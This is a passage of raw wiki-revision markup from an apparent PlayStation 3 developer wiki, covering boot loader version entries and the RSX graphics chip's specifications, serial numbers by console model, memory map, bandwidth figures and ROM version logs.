D3 77&lt;/code&gt;&amp;nbsp; || {{CECHL}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E AB&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;61 D1 9B A5 41 68 16 3C 01 9F 88 4B&lt;/code&gt;&amp;nbsp; || {{DECHJ00}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2E B3&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;92 AC 2C 21 57 A5 77 C8 4D DF EC DB&lt;/code&gt;&amp;nbsp; || {{CECHL}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 13&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;41 F7 93 C7 09 41 8F 93 89 44 BA 7A&lt;/code&gt;&amp;nbsp; || {{CECHL}}&lt;br /&gt;{{CECH2000}}&lt;br /&gt;{{DECR1400}} || Boot Loader SE Version 2.7.0 ...(Build ID: 3517,38879, .........Build Date: 2009-03-24_23:51:55) // Initial version for DECR-1400 dropped sc_dev_access support<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 13&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;FA 46 EC 86 57 0F CA AA 06 4E 8A 86&lt;/code&gt;&amp;nbsp; || {{CECH2000}} || Boot Loader SE Version 2.8.5 ...(Build ID: 3640,40665, .........Build Date: 2009-06-29_21:04:39)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 13&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;F5 A2 21 B5 C0 5F 21 42 01 97 9D AA&lt;/code&gt;&amp;nbsp; || {{CECH2000}} || Boot Loader SE Version 3.0.0 ...(Build ID: 3684,41778, .........Build Date: 2009-08-28_22:53:58)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 3B&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;77 80 B1 34 B6 DF 25 8A 1A BB AB 4D&lt;/code&gt;&amp;nbsp; || {{CECH2000}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 4B&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;EF B3 45 5D 6A 9F D7 51 00 5E 34 BC&lt;/code&gt;&amp;nbsp; || {{CECH2100}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 4B&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;53 92 1C E7 F7 33 41 76 9B 7A 1E D6&lt;/code&gt;&amp;nbsp; || {{CECH2100}}&lt;br /&gt;{{CECH2500}}&lt;br /&gt;{{DECR1400}} || Boot Loader SE Version 3.3.0 ...(Build ID: 3881,45141, .........Build Date: 2010-04-13_22:09:13)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 4B&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;CB 9E 15 24 28 B4 4F D2 F9 3F BC 43&lt;/code&gt;&amp;nbsp; || {{CECHC}}&lt;br /&gt;{{CECHE}}&lt;br /&gt;{{CECH2000}}&lt;br /&gt;{{CECH2500}} || Boot Loader SE Version 3.4.0 ...(Build ID: 3932,45679, .........Build Date: 2010-06-07_23:08:10)<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 53&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;53 E6 A0 BB B0 AF A2 00 67 D0 B3 9A&lt;/code&gt;&amp;nbsp; || {{CECH2500}} || &lt;!--// Boot Loader SE Version //--&gt; 3.5.0 / &lt;!--// Build ID //--&gt;4002,46268 / &lt;!--// Build Date //--&gt;2010-09-21_18:48:40&lt;br /&gt;Enforced 0003004FFFFFFFFF+<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F 5B&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;AA 3A EA 6E 3D A0 9A 58 1E 1E 21 00&lt;/code&gt;&amp;nbsp; || {{CECH2500}} || &lt;!--// Boot Loader SE Version //--&gt; 3.5.6 / &lt;!--// Build ID //--&gt;4275,46986 / &lt;!--// Build Date //--&gt;2011-02-15_19:06:04&lt;br /&gt;Enforced 00030055FFFFFFFF+<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F FB&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;C5 A4 27 71 EE 5E 21 9A 3B FC 2C 45&lt;/code&gt;&amp;nbsp; || {{CECH2500}} || Should be Enforced 0003005FFFFFFFFF+<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F FB&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;13 EC A7 4A 8E 14 D4 73 12 91 28 E8&lt;/code&gt;&amp;nbsp; || {{CECH3000}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 2F FB&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;63 B9 D9 81 30 DB 7B B0 F3 9D 12 4F&lt;/code&gt;&amp;nbsp; || {{CECH3000}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 30 03&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;BB CC BF 29 EC D8 02 84 4E B2 8A E6&lt;/code&gt;&amp;nbsp; || {{CECH3000}} || <br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 30 0B&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;2E 60 41 04 D9 43 D1 B5 34 D4 C5 F5&lt;/code&gt;&amp;nbsp; || {{CECH3000}} || minver 3.72<br /> |-<br /> | &amp;nbsp;&lt;code&gt;00 00 30 1B&lt;/code&gt;&amp;nbsp; || &amp;nbsp;&lt;code&gt;1F DC 1E 2D F0 0D A3 67 01 E2 F8 F6&lt;/code&gt;&amp;nbsp; || {{CECH4000}} || <br /> |-<br /> |}</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=RSX&diff=41335 RSX 2016-03-20T18:13:35Z <p>Mathieulh: /* ROM Versions */ fixed typo</p> <hr /> <div>&lt;div style=&quot;float:right&quot;&gt;[[File:SCEI CXD2971DGB.JPG|200px|thumb|left|&lt;br /&gt;RSX - Reality Synthesizer&lt;br /&gt;1st generation 90nm&lt;br /&gt;CXD2971DGB]]&lt;br /&gt;[[File:RSX-GDDR-BGA-lifted.jpg|200px|thumb|left|&lt;br /&gt;RSX - Reality Synthesizer&lt;br /&gt;GDDR3 BGA lifted]]&lt;br /&gt;[[File:RSX-GPUcore-lifted.jpg|200px|thumb|left|&lt;br /&gt;RSX - Reality Synthesizer&lt;br /&gt;GPUcore BGA lifted]]&lt;br /&gt;[[File:RSX-BGA-lifted-missingpads.jpg|200px|thumb|left|&lt;br /&gt;RSX - Reality Synthesizer&lt;br /&gt;BGA lifted&lt;br /&gt;PCB underneath]]&lt;br /&gt;[[File:Nvidia-Die-G70.png|200px|thumb|left|&lt;br /&gt;Nvidia G70 die shot]]&lt;br/&gt;[[File:RSX die - Image made by Héctor Martín.jpg|200px|thumb|left|&lt;br /&gt;RSX die, scraped with razorblade by Héctor Martín]]&lt;br/&gt;[[File:BGA_crack1.jpg|200px|thumb|left|&lt;br /&gt;BGA Cracking (one of the reasons for YLOD error)]]&lt;/div&gt;<br /> <br /> = Hardware =<br /> RSX - Reality Synthesizer<br /> <br /> The RSX 'Reality Synthesizer' is a proprietary graphics processing unit (GPU) codeveloped by Nvidia and Sony for the PlayStation 3 game console. It is a GPU based on the Nvidia 7800GTX graphics processor and, according to Nvidia, is a G70/G71 (previously known as NV47) hybrid architecture with some modifications. The RSX has separate vertex and pixel shader pipelines. The GPU makes use of 256 MB GDDR3 RAM clocked at 650&lt;!--// NOT 700!!!//--&gt; MHz with an effective transmission rate of 1.4 GHz and up to 224 MB of the 3.2 GHz XDR main memory via the CPU (480 MB max).<br /> <br /> == Specifications ==<br /> * &lt;abbr title=&quot;dmesg|grep rsx :: ps3rsx: version 2.11 RSX rev17 0MB RAM channel 1 core 500MHz mem 650MHz&quot;&gt;500&lt;/abbr&gt;&amp;nbsp;MHz on 90 nm process (shrunk to 65 nm in 2008 and to 40 nm in 2010)<br /> * Based on NV47 Chip (Nvidia GeForce 7800 Architecture)<br /> ** early development tools had NV47 with 256 bit local memory interface and 16 ROPs<br /> ** later RSX with 128bit local memory interface and 8 ROPs<br /> * Little Endian<br /> ** 300+ million transistors<br /> ** Multi-way programmable parallel floating-point shader pipelines<br /> *** Independent pixel/vertex shader architecture<br /> *** 24 parallel pixel-shader ALU pipes clocked @ 550 MHz<br /> **** 5 ALU operations per pipeline, per cycle (2 vector&lt;sub&gt;4&lt;/sub&gt; , 2 scalar/dual/co-issue and fog ALU, 1 Texture ALU)<br /> **** 27 floating-point operations per pipeline, per cycle<br /> *** 8 parallel vertex pipelines<br /> **** 2 ALU operations per pipeline, per cycle (1 vector&lt;sub&gt;4&lt;/sub&gt; and 1 scalar, dual issue)<br /> **** 10 FLOPS per pipeline, per cycle<br /> *** Floating Point Operations: 400.4 Gigaflops ((24 * 27 Flops + 8 * 10 Flops) * 550)<br /> ** 24 texture filtering units (TF) and 8 vertex texture addressing units (TA)<br /> *** 24 filtered samples per clock<br /> **** Maximum Texel fillrate: 12.0 GigaTexels per second (24 textures * 500&amp;nbsp;MHz)<br /> *** 32 unfiltered texture samples per clock, ( 8 TA x 4 texture samples )<br /> ** 8 Render Output units / pixel rendering pipelines<br /> *** Peak pixel fillrate (theoretical): 4.0 Gigapixel per second<br /> *** Maximum Z-buffering sample rate: 8.0 GigaSamples per second (2 Z-samples * 8 ROPs * 500&amp;nbsp;MHz)<br /> ** Maximum Dot product operations: 51 billion per second (combined with Cell CPU)<br /> ** 128-bit pixel precision offers rendering of scenes with High dynamic range rendering<br /> ** 256 MB GDDR3 RAM at &lt;abbr title=&quot;dmesg|grep rsx :: ps3rsx: version 2.11 RSX rev17 0MB RAM channel 1 core 500MHz mem 650MHz&quot;&gt;650&amp;nbsp;MHz&lt;/abbr&gt;&lt;!--// NOT 700 !! //--&gt;<br /> *** Earlier PS3 Models: Samsung K4J52324QC-SC14 rated max 700MHz<br /> *** Later PS3 Models: Qimonda HYB18H512322AF-14 (seen on CXD2971DGB)<br /> *** 128-bit memory bus width<br /> *** 22.4 GB/s read and write bandwidth<br /> ** Cell FlexIO bus interface<br /> *** Rambus XDR Memory interface bus width: 56bit out of 64bit (serial)<br /> *** 20 GB/s read to the Cell and XDR memory<br /> *** 15 GB/s write to the Cell and XDR memory<br /> ** Support for PSGL (OpenGL ES 1.1 + Nvidia Cg)<br /> ** Support for S3 Texture Compression<br /> <br /> <br /> <br /> More features are revealed in the following chart delineating the differences between the RSX and the nVidia 7800 GTX.<br /> <br /> {|class=&quot;wikitable&quot;<br /> |-<br /> ! Difference !! RSX !! nVidia 7800GTX<br /> |-<br /> | GDDR3 Memory bus || 128bit || 256bit<br /> |-<br /> | ROPs || 8 || 16<br /> |-<br /> | Post Transform and Lighting Cache || 63 max vertices || 45 max vertices<br /> |-<br /> | Total Texture Cache Per Quad of Pixel Pipes (L1 and L2) || 96kB || 48kB<br /> |-<br /> | CPU interface || FlexIO || PCI-Express 16x<br /> |-<br /> | Technology || 40nm/65nm/90nm || 110nm<br /> |-<br /> |}<br /> <br /> Other RSX features/differences include:<br /> <br /> More shader instructions<br /> Extra texture lookup logic (helps RSX transport data from XDR)<br /> Fast vector normalize <br /> <br /> Note that the cache (Post Transform and Lighting Vertext Cache) is located between the vector shader and the triangle setup.<br /> <br /> A sample flow of data inside the RSX would see them first processed by 8 vertex shaders. The output are then sent to the 24 active pixel shaders, which can involve the 24 active texture units. Finally, the data is passed to the 8 Raster Operation Pipeline units (ROPs), and on out to the GDDR3. Note that the pixel shaders are grouped into groups of four (called Quads). There are 7 Quads, with 1 redundant, leaving 6 Quads active, which provides us with the 24 active pixel shaders listed above (6 times 4 equals 24). Since each Quad has 96kB of L1 and L2 cache, the total RSX texture cache is 576kB. General RSX features include 2x and 4x hardware anti-aliasing, and support for Shader Model 3.0.<br /> <br /> == Serial Numbers @ SKU's ==<br /> &lt;gallery&gt;<br /> File:PS3 - RSX - 40nm 65nm 90nm - die sizes.jpg|[[RSX]] die sizes, left to right: 40nm 65nm 90nm<br /> &lt;/gallery&gt;<br /> <br /> The following is a small sample of serial numbers of the RSX by model number.<br /> <br /> {|class=&quot;wikitable&quot;<br /> |-<br /> ! PS3 Model !! Mobo Model !! Mobo serial !! RSX Serial !! Die Tech !! Die Size !! Remark<br /> |-<br /> | [[CECHAxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-12 || [[CXD2971GB]] || 90nm || 258mm² || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHAxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-12 || [[CXD2971AGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHAxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-22 || [[CXD2971DGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHAxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-32 || [[CXD2971DGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHAxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-32 || [[CXD2971AGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHBxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-22 || [[CXD2971DGB]] || 90nm || 258mm² || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHBxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-32 || [[CXD2971DGB]] || 90nm || 258mm² || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHCxx]] || [[COK-00x#COK-002|COK-002]] || 1-873-513-11 || [[CXD2971DGB]] || 90nm || 258mm² || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHCxx]] || [[COK-00x#COK-002|COK-002]] || 1-873-513-21 || [[CXD2971GB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHCxx]] || [[COK-00x#COK-002|COK-002]] || 1-873-513-31 || [[CXD2971DGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;[[CECHDxx]]&lt;/span&gt; || colspan=&quot;6&quot; style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;SKU never released&lt;/span&gt;<br /> |-<br /> | [[CECHExx]] || [[COK-00x#COK-002W|COK-002W]] || 1-873-513-xx || -? || 90nm || 258mm² || -<br /> |-<br /> | style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;[[CECHFxx]]&lt;/span&gt; || colspan=&quot;6&quot; style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;SKU never released&lt;/span&gt;<br /> |-<br /> | [[CECHGxx]] || [[SEM-00x|SEM-001]] || 1-875-384-xx || [[CXD2971DGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHGxx]] || [[SEM-00x|SEM-001]] || 1-875-384-xx || [[CXD2971BGB]]&lt;br /&gt;&amp;nbsp;&amp;nbsp;or:&lt;br /&gt;[[CXD2971DGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHGxx]] || [[SEM-00x|SEM-001]] || 1-875-384-xx || [[CXD2971AGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHGxx]] || [[SEM-00x|SEM-001]] || 1-875-384-xx || [[CXD2971DGB]] || 90nm || 258mm² || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHHxx]] || [[DIA-00x#DIA-001|DIA-001]] || 1-875-938-11 || [[CXD2971AGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHHxx]] || [[DIA-00x#DIA-001|DIA-001]] || 1-875-368-11 || [[CXD2971-1GB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHHxx]] || [[DIA-00x#DIA-001|DIA-001]] || 1-875-368-11 || [[CXD2971AGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHHxx]] || [[DIA-00x#DIA-001|DIA-001]] || 1-875-368-11 || [[CXD2971AGB]] || 90nm || 258mm² || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;[[CECHIxx]]&lt;/span&gt; || colspan=&quot;6&quot; style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;SKU never released&lt;/span&gt;<br /> |-<br /> | [[CECHJxx]] || [[DIA-00x#DIA-002|DIA-002]] || 1-876-912-xx || [[CXD2982GB]] || 65nm || ? 186mm² ? || -<br /> |-<br /> | [[CECHKxx]] || [[DIA-00x#DIA-002|DIA-002]] || 1-876-912-42 || [[CXD2982GB]] || 65nm || ? 186mm² ? || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHKxx]] || [[DIA-00x#DIA-002|DIA-002]] || 1-876-912-xx || [[CXD2982GB]] || 65nm || ? 186mm² ? || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHLxx]] || [[VER-00x|VER-001]] || 1-878-196-31 || [[CXD2991GB]] || 65nm || ? 186mm² ? || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHLxx]] || [[VER-00x|VER-001]] || 1-878-196-31 || [[CXD2991GB]] || 65nm || ? 186mm² ? || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHMxx]] || [[VER-00x|VER-001]] || 1-878-196-31 || -? || 65nm || ? 186mm² ? || -<br /> |-<br /> | style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;[[CECHNxx]]&lt;/span&gt; || colspan=&quot;6&quot; style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;SKU never released&lt;/span&gt;<br /> |-<br /> | style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;[[CECHOxx]]&lt;/span&gt; || colspan=&quot;6&quot; style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;SKU never released&lt;/span&gt;<br /> |-<br /> | [[CECHPxx]] || [[VER-00x|VER-001]] || 1-878-196-31 || -? || 65nm || ? 186mm² ? || -<br /> |-<br /> | [[CECHQxx]] || [[VER-00x|VER-001]] || 1-878-196-31 || -? || 65nm || ? 186mm² ? || -<br /> |-<br /> | [[CECH-20xx]] || [[DYN-00x|DYN-001]] || 1-880-055-31 || [[CXD2991CGB]] || 65nm || ? 186mm² ? || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECH-20xx]] || [[DYN-00x|DYN-001]] || 1-880-055-31 || [[CXD2991EGB]] || 65nm || ? 186mm² ? || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECH-20xx]] || [[DYN-00x|DYN-001]] || 1-880-055-31 || [[CXD2991EGB]] || 65nm || ? 186mm² ? || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECH-21xx]] || [[SUR-00x|SUR-001]] || 1-881-945-11 || [[CXD5300AGB]] || 40nm || ? 114mm² ? || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECH-21xx]] || [[SUR-00x|SUR-001]] || 1-881-945-11 || [[CXD5300AGB]] || 40nm || ? 114mm² ? || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECH-25xx]] || [[JTP-00x|JTP-001]] || 1-882-481-11 || [[CXD5300A1GB]] || 40nm || ? 114mm² ? || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECH-25xx]] || [[JSD-00x|JSD-001]] || 1-882-770-11 || [[CXD5300A1GB]] || 40nm || ? 114mm² ? || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECH-30xx]] || [[KTE-00x|KTE-001]] || 1-884-749-11 || [[CXD5301DGB]] || 40nm || ? 114mm² ? || -<br /> |-<br /> | [[CECH-40xx]] || [[MSX-00x|MSX-001]] || 1-886-928-11 || [[CXD5302DGB]] || 40nm || ? 114mm² ? || -<br /> |-<br /> | [[CECH-40xx]] || [[MPX-00x|MPX-001]] || 1-887-233-11 || [[CXD5302A1GB]] || 40nm || ? 114mm² ? || - [http://pocketnews.cocolog-nifty.com/pkns/2012/10/ps3-cech-4000-e.html pocketnews dissasembly]<br /> |-<br /> |}<br /> Other unspecified: [[CXD297BGB]] and [[CXD2971-1GB]] (CECHA&lt;!--//Pereb//--&gt; refurbished? note:lowest FW was 2.30)<br /> ===Alternative list===<br /> * [[CECHAxx]]/[[COK-00x#COK-001|COK-001]], [[CECHBxx]]/[[COK-00x#COK-001|COK-001]], [[CECHCxx]]/[[COK-00x#COK-002|COK-002]], [[CECHExx]]/[[COK-00x#COK-002W|COK-002W]] and [[CECHHxx]]/[[DIA-00x#DIA-001|DIA-001]] : [[CXD2971AGB]] (RSX 90nm)<br /> * [[CECHGxx]]/[[SEM-00x|SEM-001]] : [[CXD2971DGB]] (RSX 90nm)<br /> * [[CECHJxx]]/[[DIA-00x#DIA-002|DIA-002]] and [[CECHKxx]]/[[DIA-00x#DIA-002|DIA-002]] : [[CXD2982]] (RSX 65nm)<br /> * [[CECHLxx]]/[[VER-00x|VER-001]] up to including [[CECHQxx]]/[[VER-00x|VER-001]] : [[CXD2991BGB]] (RSX 65nm)<br /> * [[CECH-20xx]]/[[DYN-00x|DYN-001]] : [[CXD2991GGB]] (RSX 65nm)<br /> * [[CECH-21xx]]/[[SUR-00x|SUR-001]] : [[CXD5300AGB]] (RSX 40nm)<br /> * [[CECH-25xx]]/[[JTP-00x|JTP-001]] and [[CECH-25xx]]/[[JSD-00x|JSD-001]]: [[CXD5300A1GB]] (RSX 40nm)<br /> * [[CECH-30xx]]/[[KTE-00x|KTE-001]] : [[CXD5301DGB]] (RSX 40nm)<br /> &lt;br /&gt;<br /> <br /> == Local GDDR3 Memory Physical Structure==<br /> * Total Memory 256MB<br /> * 2 Partitions (128MB)<br /> * 64bit bus per partition<br /> * 8 Banks per partition (16MB)<br /> * 4096 Pages per bank (4KB) -&gt; 12bit Row Address<br /> * Memory block in a page -&gt; 9bit Column Address<br /> * Minimum access granularity = 8 bytes -&gt; same as buswidth between RSX &lt;&gt; GDDR<br /> <br /> =Software=<br /> <br /> == RSX Memorymap ==<br /> <br /> Although the RSX has 256MB of GDDR3 RAM, not all of it is useable. The last 4MB is reserved for keeping track of the RSX internal state and issued commands. The 4MB of GPU Data contains RAMIN, RAMHT, RAMFC, DMA Objects, Graphic Objects, and the Graphic Context. The following is a breakdown of the address within 256MB of the RSX.<br /> <br /> {|class=&quot;wikitable&quot;<br /> |-<br /> ! Address Range !! Size !! Comment<br /> |-<br /> | 0000000-FBFFFFF || 252 MB || Framebuffer<br /> |-<br /> | FC00000-FFFFFFF || 4 MB || GPU Data<br /> |-<br /> | FF80000-FFFFFFF || 512KB || RAMIN: Instance Memory<br /> |-<br /> | FF90000-FF93FFF || 16KB || RAMHT: Hash Table<br /> |-<br /> | FFA0000-FFA0FFF || 4KB || RAMFC: FIFO Context<br /> |-<br /> | FFC0000-FFCFFFF || 64KB || DMA Objects<br /> |-<br /> | FFD0000-FFDFFFF || 64KB || Graphic Objects<br /> |-<br /> | FFE0000-FFFFFFF || 128KB || GRAPH: Graphic Context<br /> |-<br /> |}<br /> <br /> Besides local GDDR3 memory, main XDR memory can be accessed by RSX too, which is limited to either:<br /> * 0MB - 256MB (0x00000000 - 0x0FFFFFFF)<br /> ::-or-<br /> * 0MB - 512MB (0x00000000 - 0x1FFFFFFF)<br /> <br /> ==Speed, Bandwidth, and Latency==<br /> <br /> System bandwith (theoretical maximum):<br /> *Cell to/from 256MB XDR : 25.6 GB/s<br /> *Cell to RSX (IOIFO): 20GB/s (practical : 15.8GB/s @ packetsize 128B)<br /> *Cell from RSX (IOIFI) : 15GB/s (practical : 11.9GB/s @ packetsize 128B)<br /> *RSX to/from 256MB GDDR3 : 20.8GB/s (@ 650MHz)<br /> <br /> Because of the aforementioned layout of the communication path between the different chips, and the latency and bandwidth differences between the various components, there are different access speeds depending on the direction of the access in relation to the source and destination. The following is a chart showing the speed of reads and writes to the GDDR3 and XDR memory from the viewpoint of the Cell and RSX. Note that these are measured speeds (rather than calculated speeds) and they should be worse if RSX and GDDR3 access are involved because these figures were measured when the RSX was clocked at 550Mhz and the GDDR3 memory was clocked at 700Mhz. The shipped PS3 has the RSX clocked in at 500Mhz (front and back end, although the pixel shaders run separately inside at 550Mhz). In addition, the GDDR3 memory was also clocked lower at 650Mhz.<br /> <br /> === speed table ===<br /> {|class=&quot;wikitable&quot;<br /> |-<br /> ! Processor !! 256MB XDR !! 256MB GDDR3<br /> |-<br /> | Cell Read || 16.8GB/s || 16MB/s (15.6MB/s @ 650MHz)<br /> |-<br /> | Cell Write || 24.9GB/s || 4GB/s<br /> |-<br /> | RSX Read || 15.5GB/s || 22.4GB/s (20.8GB/s @ 650MHz)<br /> |-<br /> | RSX Write || 10.6GB/s || 22.4GB/s (20.8GB/s @ 650MHz)<br /> |-<br /> |}<br /> <br /> Because of the VERY slow Cell Read speed from the 256MB GDDR3 memory, it is more efficient for the Cell to work in XDR and then have the RSX pull data from XDR and write to GDDR3 for output to the HDMI display. This is why extra texture lookup instructions were included in the RSX to allow loading data from XDR memory (as opposed to the local GDDR3 memory).<br /> <br /> == ROM Versions ==<br /> <br /> These are the listed RSX ROM (aka Vbios) versions info we have collected from lv1 debug ouput<br /> <br /> DEH/DECR-1000:<br /> <br /> &lt;pre&gt;<br /> [INFO]: BE:3.1, SB:DX3.1<br /> rsx: a01 420/600 vpe:ff shd:3f [AE0000915:0:1:16:b:f:1:1:1]<br /> <br /> [INFO]: BE:3.1, SB:DX3.1<br /> rsx: a02 420/600 vpe:ff shd:3f [F9A458700:0:2:3:b:f:3:1:1][0:0:0:0:0:3]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b01 500/650 vpe:ff shd:5f [AE0000993:0:1:13:c:a:1:4:2][16:3:0:0:1:3:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b01 500/600 vpe:ff shd:77 [FCA684200:0:2:2:f:7:3:5:1][0:0:0:0:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b01 500/650 vpe:ff shd:5f [AE0000993:0:1:13:c:a:1:4:2][16:3:0:0:1:3:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b01 500/650 vpe:ff shd:7d [G1A778601:1:2:15:7:10:3:7:2][16:3:0:0:1:3:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b03 500/650 vpe:ff shd:7b [GAB886100:1:2:17:f:5:3:f:2][16:3:0:0:1:3:1][0:0:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b03 500/650 vpe:ff shd:7b [GAB886100:1:2:4:7:5:3:f:2][16:3:0:0:1:3:1][0:0:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b07 500/650 vpe:ff shd:3f [J3E106900:1:2:c:b:6:3:12:1][16:3:2:0:1:3:1][0:0:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b07 500/650 vpe:ff shd:3f [J3E107200:1:2:a:6:3:3:12:1][16:3:2:0:1:3:1][0:0:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b07 500/650 vpe:ff shd:3f [J3E078500:1:2:11:c:f:3:12:1][16:3:2:0:1:3:1][0:0:0]<br /> &lt;/pre&gt;<br /> <br /> RETAIL: <br /> &lt;pre&gt;<br /> [INFO]: BE:3.1, SB:DX3.1<br /> rsx: b08 1f4/28a vpe:ff shd:3f [AP0004687:1:1:14:13:a:2:f:1][16:3:1:1:1:3:1][0:0:0]<br /> &lt;/pre&gt;<br /> <br /> Speculatively it is likely that 